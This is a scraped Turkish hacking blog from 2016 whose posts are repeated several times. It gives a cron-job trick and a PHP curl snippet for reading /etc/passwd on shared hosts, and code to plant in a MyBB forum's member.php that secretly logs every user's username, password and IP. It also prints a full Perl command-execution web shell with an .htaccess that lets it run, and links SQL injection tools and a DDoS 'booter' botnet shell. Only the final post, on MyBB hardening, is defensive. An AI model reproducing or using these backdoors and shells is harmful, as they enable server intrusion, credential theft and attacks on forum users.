cloud flare videolu bypass
0
Cron Jobs Server Bypass Method
22 Eylül 2016 Perşembe
Morena
Evet dostlar, cron jobs cpanel yazılımıdır. Zamanlanmış görev anlamını taşır. Bu methodu deniyebilmemiz için hedef sitenin cpanel yazılımını kullanması gerekir ve cpanel bilgilerini bilmeniz gerekir.
cPanele giriş yaptıktan sonra Advanced(Gelişmiş) bölümünden Cron Jobs’a geliyoruz
Common Settings: Bölümünü Every minute yapıyoruz.
Command bölümüne
cat /etc/passwd > s4.txt yazıyoruz. Ve "Add New Cron Job" Tıklıyoruz.
İşlemimiz aslında bu kadar s4.txt dosyası /home/kullanıcıadı bölümüne gitti. s4.txt dosyasının içeriğine bakarsanız passwd ’ yi rahatlıkla görebilirsiniz
cPanele giriş yaptıktan sonra Advanced(Gelişmiş) bölümünden Cron Jobs’a geliyoruz
Common Settings: Bölümünü Every minute yapıyoruz.
Command bölümüne
cat /etc/passwd > s4.txt yazıyoruz. Ve "Add New Cron Job" Tıklıyoruz.
İşlemimiz aslında bu kadar s4.txt dosyası /home/kullanıcıadı bölümüne gitti. s4.txt dosyasının içeriğine bakarsanız passwd ’ yi rahatlıkla görebilirsiniz
Etiketler:
cron Jobs bypass,
server bypass
0
mkDIR(“file:”);chdir(“file:”);mkDIR(“etc”);chdir(“etc”);mkDIR(“passwd”);chdir(“..”);chdir(“..”);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “file:file:///etc/passwd”);curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);mkDIR(“file:”);chdir(“file:”);mkDIR(“etc”);chdir(“etc”);mkDIR(“passwd”);chdir(“..”);chdir(“..”);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “file:file:///etc/passwd”);curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
Php Eval Code İle Server Bypass.
Morena
mkDIR(“file:”);chdir(“file:”);mkDIR(“etc”);chdir(“etc”);mkDIR(“passwd”);chdir(“..”);chdir(“..”);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “file:file:///etc/passwd”);curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);mkDIR(“file:”);chdir(“file:”);mkDIR(“etc”);chdir(“etc”);mkDIR(“passwd”);chdir(“..”);chdir(“..”);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “file:file:///etc/passwd”);curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
Etiketler:
php eval,
server bypass
0
Sqlmap Kullanımı Videolu Anlatım.
21 Eylül 2016 Çarşamba
Morena
Etiketler:
Sqlmap,
sqlmap kullanım,
sqlmap video
1
Windows'a SqlMap Kurulumu
20 Eylül 2016 Salı
Morena
size linklerini verdiğim dosyalarını indirin öncelikle
python 2.7 adlı setup u açıp Python kuruyoruz
sqlmap adlı dosyayı Yerel Disk C'ye Atıyoruz c:\ dizinine atıyoruz.
daha sonra başlat çalıştır cmd giriyoruz ve c:\ dizinine iniyoruz yani
cd..
cd..
C:\> Girdik daha sonra
cd sqlmap komutu ile sqlmap a geçiş yapıyoruz
bir başka makaledeyse sqlmap kullanımını anlatacağım
http://sqlmap.org/
https://www.python.org/download/releases/2.7/
Etiketler:
Sqlmap,
sqlmap kurulumu
0
Havij 1.152 Pro
Morena
buyrun sizlere havij 1.152 güvenle indirebilirsiniz havij windows üzerine yapılmış en iyi sql injecktion toolstur. içerisinde md5 cracker ve admin panel bulucuda yer alır.
http://www.mediafire.com/download/zd3r1agdu78e5l4/Havij+1.152+Pro.rar
http://www.mediafire.com/download/zd3r1agdu78e5l4/Havij+1.152+Pro.rar
Etiketler:
havij,
havij indir
0
arkadaşlar member.php yi açıp php satırının altına
kodları ekliyoruz
$kadi = $_POST['username'];
$sifresi = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('bighatz/bh.html', 'a');
$yaz ="<font color='green'>Kulanici Adi :</font><font color='red'> $kadi</font><br>
<font color='green'>Sifresi :</font><font color='red'> $sifresi</font><br>
<font color='green'>Ip Adresi :</font><font color='red'> $ip</font><br><hr>";
fwrite($file,$yaz);
fclose($file);
daha sonra public_html de bighatz diye klasör açıp içerisine bh.html koyuyoruz ve tüm girişleri buraya yazıyor bighatz klasörünü dizin şifreleyiciyle şifrelemeniz önemlidir.
MyBB Foruma şifre log'u kurma
Morena
arkadaşlar member.php yi açıp php satırının altına
kodları ekliyoruz
$kadi = $_POST['username'];
$sifresi = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('bighatz/bh.html', 'a');
$yaz ="<font color='green'>Kulanici Adi :</font><font color='red'> $kadi</font><br>
<font color='green'>Sifresi :</font><font color='red'> $sifresi</font><br>
<font color='green'>Ip Adresi :</font><font color='red'> $ip</font><br><hr>";
fwrite($file,$yaz);
fclose($file);
daha sonra public_html de bighatz diye klasör açıp içerisine bh.html koyuyoruz ve tüm girişleri buraya yazıyor bighatz klasörünü dizin şifreleyiciyle şifrelemeniz önemlidir.
Etiketler:
MyBB Hack,
MyBB Şifre log
0
Safe sql Tarayıcı SafeWVS 3.0
Morena
web sitelerinde sql xss açıklarını çok iyi tarayan bi programdır.
http://www.mediafire.com/download/5zuc7jyp023b073/safe+sql.rar
http://www.mediafire.com/download/5zuc7jyp023b073/safe+sql.rar
Etiketler:
Safe sql,
sql injecktion
0
Kerinci tools 0.7
Morena
Kerinci Tools Özelikleri
-Web Scanner
-SQL Injector
-Web Explorer
-URL Fuzzer
-Hash Cracker
-TCP Connect
-N Map
-CMD Shell
-Pastebin
-Decoder
https://yadi.sk/d/wimTdJIVfc87B
-Web Scanner
-SQL Injector
-Web Explorer
-URL Fuzzer
-Hash Cracker
-TCP Connect
-N Map
-CMD Shell
-Pastebin
-Decoder
https://yadi.sk/d/wimTdJIVfc87B
Etiketler:
Kerinci tools
0
cmd.pl çalıştırmak güvenlikli sunucuda
Morena
öncelikle bigh diye bi klasör oluşturuyoruz ve içinde .htaccesimizi atıyoruz daha sonra prix i yükleyip txt cmd shelli yüklüyoruz ve shell dizinini kendimize göre editliyoruz ve girdigimizde işlem tamam.
shell kodları
#!/home/bighatz/public_html/bighatz/prix -s
#
# PerlKit-0.1 - http://www.t0s.org
#
# cmd.pl: Run commands on a webserver
use strict;
my ($cmd, %FORM);
$|=1;
print "Content-Type: text/html\r\n";
print "\r\n";
# Get parameters
%FORM = parse_parameters($ENV{'QUERY_STRING'});
if(defined $FORM{'cmd'}) {
$cmd = $FORM{'cmd'};
}
print '<HTML>
<body>
<form action="" method="GET">
<input type="text" name="cmd" size=45 value="' . $cmd . '">
<input type="submit" value="Run">
</form>
<pre>';
if(defined $FORM{'cmd'}) {
print "Results of '$cmd' execution:\n\n";
print "-"x80;
print "\n";
open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
while(<CMD>) {
print;
}
close(CMD);
print "-"x80;
print "\n";
}
print "</pre>";
sub parse_parameters ($) {
my %ret;
my $input = shift;
foreach my $pair (split('&', $input)) {
my ($var, $value) = split('=', $pair, 2);
if($var) {
$value =~ s/\+/ /g ;
$value =~ s/%(..)/pack('c',hex($1))/eg;
$ret{$var} = $value;
}
}
return %ret;
}
.htaccess kodları
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .txt
AddHandler cgi-script .pl
AddHandler cgi-script .pl
prix indirme linki : ttps://drive.google.com/open?id=0ByCV0B0bUdJucUJpeU5ybUg3VUE
shell kodları
#!/home/bighatz/public_html/bighatz/prix -s
#
# PerlKit-0.1 - http://www.t0s.org
#
# cmd.pl: Run commands on a webserver
use strict;
my ($cmd, %FORM);
$|=1;
print "Content-Type: text/html\r\n";
print "\r\n";
# Get parameters
%FORM = parse_parameters($ENV{'QUERY_STRING'});
if(defined $FORM{'cmd'}) {
$cmd = $FORM{'cmd'};
}
print '<HTML>
<body>
<form action="" method="GET">
<input type="text" name="cmd" size=45 value="' . $cmd . '">
<input type="submit" value="Run">
</form>
<pre>';
if(defined $FORM{'cmd'}) {
print "Results of '$cmd' execution:\n\n";
print "-"x80;
print "\n";
open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
while(<CMD>) {
print;
}
close(CMD);
print "-"x80;
print "\n";
}
print "</pre>";
sub parse_parameters ($) {
my %ret;
my $input = shift;
foreach my $pair (split('&', $input)) {
my ($var, $value) = split('=', $pair, 2);
if($var) {
$value =~ s/\+/ /g ;
$value =~ s/%(..)/pack('c',hex($1))/eg;
$ret{$var} = $value;
}
}
return %ret;
}
.htaccess kodları
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .txt
AddHandler cgi-script .pl
AddHandler cgi-script .pl
prix indirme linki : ttps://drive.google.com/open?id=0ByCV0B0bUdJucUJpeU5ybUg3VUE
Etiketler:
cmd shell,
linux bypass,
litespeed bypass,
priv bypass,
server bypass
0
php booter shell
19 Eylül 2016 Pazartesi
Morena
meraba gençler bugün sizlere beinm çoook aradıgım ve sonunda buldugum booter ı paylaşcam çok aradım osnudna buldum %100 çalışıyo ne kadar çok site eklerseniz o kadar iyi vuruyo
https://github.com/shahril96/PHP-Shell-B...master.zip
kurulum anlatım (ingilizce ama zor deyil)
https://github.com/shahril96/PHP-Shell-B...master.zip
kurulum anlatım (ingilizce ama zor deyil)
Etiketler:
botnet,
php booter shell
0
MyBB Güvenlik Priv
Morena
şimdi herkes config.php yolunun değişir ama bu init.php çekilerek bulunur peki init.php değiştirilemezmi ? tabiki değişir
/xmlhttp.php dosyasında bul:
require_once dirname(__FILE__).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(__FILE__).-/inc/yeni dosya ismi.php”;
/task.php dosyasında bul:
require_once dirname(__FILE__).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(__FILE__).-/inc/yeni dosya ismi.php”;
/global.php dosyasında bul:
require_once $working_dir.-/inc/init.php’;
Yeni İnit adı ile değiştir
require_once $working_dir.-/inc/yeni dosya ismi.php’;
/css.php dosyasında bul:
require_once -./inc/init.php”;
Yeni İnit adı ile değiştir
require_once -./inc/yeni dosya ismi.php”;
/archive/global.php dosyasında bul:
require_once dirname(dirname(__FILE__)).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(dirname(__FILE__)).-/inc/yeni dosyaismi.php”;
/admin/index.php dosyasında bul:
require_once dirname(dirname(__FILE__)).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(dirname(__FILE__)).-/inc/yeni dosyaismi.php”;
işlemleri yaptıktan sonra fake /init.php ve config.php koymayı unutmayın eleman uğraşıp dursun
bu arada yeni yaptıgımız init.php ve configin chmod larını 444 yapıyoruz işlem tamamdır artık kolay kolay swden siteye geçiş sağlanmaz.
Alıntı Yapmak Yasaktır
/xmlhttp.php dosyasında bul:
require_once dirname(__FILE__).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(__FILE__).-/inc/yeni dosya ismi.php”;
/task.php dosyasında bul:
require_once dirname(__FILE__).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(__FILE__).-/inc/yeni dosya ismi.php”;
/global.php dosyasında bul:
/global.php dosyasında bul:
require_once $working_dir.-/inc/init.php’;
Yeni İnit adı ile değiştir
require_once $working_dir.-/inc/yeni dosya ismi.php’;
/css.php dosyasında bul:
require_once -./inc/init.php”;
Yeni İnit adı ile değiştir
require_once -./inc/yeni dosya ismi.php”;
/archive/global.php dosyasında bul:
require_once dirname(dirname(__FILE__)).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(dirname(__FILE__)).-/inc/yeni dosyaismi.php”;
/admin/index.php dosyasında bul:
require_once dirname(dirname(__FILE__)).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(dirname(__FILE__)).-/inc/yeni dosyaismi.php”;
işlemleri yaptıktan sonra fake /init.php ve config.php koymayı unutmayın eleman uğraşıp dursun
bu arada yeni yaptıgımız init.php ve configin chmod larını 444 yapıyoruz işlem tamamdır artık kolay kolay swden siteye geçiş sağlanmaz.
Alıntı Yapmak Yasaktır
Etiketler:
Morena,
mybb,
mybb güvenlik,
mybb security,
mybullettin
Kaydol:
Kayıtlar (Atom)